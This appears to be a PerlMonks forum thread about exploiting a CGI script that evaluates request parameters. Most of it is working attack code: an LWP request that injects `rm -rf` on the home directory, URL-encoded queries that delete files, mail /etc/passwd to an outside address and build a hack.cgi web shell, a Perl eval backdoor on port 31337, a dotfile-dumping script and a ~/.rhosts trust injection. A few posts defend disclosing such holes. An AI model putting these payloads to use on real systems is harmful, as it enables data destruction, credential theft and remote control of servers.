my $evil_code = q{system "/bin/rm", "-rf", $ENV{HOME};};
use LWP::UserAgent;
use HTTP::Request::Common;
LWP::UserAgent->new->simple_request(
  POST 'http://this.machine/url.for.evil.cgi', ["x; $evil_code; \$x" =
+> "You lose"]
);
[download]

-- Randal L. Schwartz, Perl hacker

bad.cgi?var%3Dtext%3B%60rm%20-rf%20%2F%60

or

bad.cgi?var%3Dtext%3Bwarn%20%27ha%27%20while%201

or

bad.cgi?var%3Dtext%3B%60mail%20%3C%20%2Fetc%2Fpasswd%20me%40isp.com%60

or

bad.cgi?var%3Dtext%3B%60echo%20%27%23%21%2Fusr%2Flocal%2Fbin%2Fperl%27
+%20%3E%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60echo%20%27use%20CGI%20qw%2F%3Aall%2F%3B%27%20%
+3E%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60echo%20%27%24cmd%20%3D%20param%28%22cmd%22%29%
+3B%27%20%3E%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60echo%20%27print%20header%2Cstart_html%3B%20%3E
+%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60echo%20%27print%20%5C%60%24cmd%5C%60%2C%20end_
+html%3B%20%3E%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60chmod%20%2Bx%20hack.cgi%60
[download]

bad.cgi?var=text;`rm -rf /`

or

bad.cgi?var=text;warn 'ha' while 1

or

bad.cgi?var=text;`mail < /etc/passwd me@isp.com`

or

bad.cgi?var=text;`echo '#!/usr/local/bin/perl' > hack.cgi`
bad.cgi?var=text;`echo 'use CGI qw/:all/;' > hack.cgi`
bad.cgi?var=text;`echo '$cmd = param("cmd");' > hack.cgi`
bad.cgi?var=text;`echo 'print header,start_html; > hack.cgi`
bad.cgi?var=text;`echo 'print \`$cmd\`, end_html; > hack.cgi`
bad.cgi?var=text;`chmod +x hack.cgi`
[download]

--
Casey
   I am a superhero.

I'd set up a nice and cozy backdoor which gives me 31337 r4w P3rl P0w3r™. The code is the following :

use IO::Socket;
use Net::hostent;
$s=IO::Socket::INET->new(Proto=>'tcp',LocalPort=>31337,Listen=>SOMAXCO
+NN,Reuse=>1);
while($c=$s->accept()) {
$c->autoflush(1);
print$c"Welcome. My box is your box.\n>";
print($c eval,"\n>")while(defined$c&&<$c>);
[download]

which would be encoded into an URL in the obvious way demonstrated above (yes, I'm too lazy for this now :-). I wonder if that code for a Perl s?hell can be made any prettier/smaller ...

The PHP programmer meant to do this:

my $query = new CGI;

$query->import_names('R');

print $R::ParamNameFromCGI; # or whatever
[download]

Russ
Brainbench 'Most Valuable Professional' for Perl

http://server.domain/index.cgi?Blah=%60cat%20/etc/passwd%60;%20print%2
+0$Blah
[download]

Russ
Brainbench 'Most Valuable Professional' for Perl

#!/usr/bin/perl
print "Content-type: text/html\n\n";
print "<h1>Hey dudez, my server root password is: <i>dumass</i></h1>";
exit;
[download]

`perl -V`
[download]

Or suidperl

Gasp!

--
Casey
   I am a superhero.

Dang. Fixed it here and so forgot that the portability of Perl was demonstrated with a nicely portable rootkit. :-(

Very good catch.

use File::Find;
find('/');

sub wanted {
    if (/^\.\w/) {
        print "$File::Find::name<p>\n<pre>";
        @ARGV = $File::Find::name;
        print while (<>);
        print "</pre><p>\n";
    }
}
[download]

My thoughts, worth exactly what you paid for them 8^)
    cheers,
    ybiC

I had a similar reaction for a second, but that's the old security through obscurity concept again, which has served us so well in the past (I'M KIDDING!).

The abuses for the bad code are many and varied and really not that difficult to devise either (even I understand them!), so the solution is to try to inform (and perhaps frighten) those responsible for insecure code so that the holes can be repaired, rather than to pretend that the abuses can be kept secret.

(my $0.02, and that's Canadian dollars!)

Well said, Albannach.   I wouldn't argue with you for a moment.

My motives are actually quite selfish - I'm behind a blocklist-subscribed firewall all day, and would be a very sad monk if it started blocking PM.     8^(
    cheers,
    ybiC

qw(system "echo","+ +",">>~/.rhost";);
[download]

Right, the point of my script is that $evil_code can be any Perl code, so I've reduced the problem to "where do you want to go today?" with whatever choice of damage you want.

-- Randal L. Schwartz, Perl hacker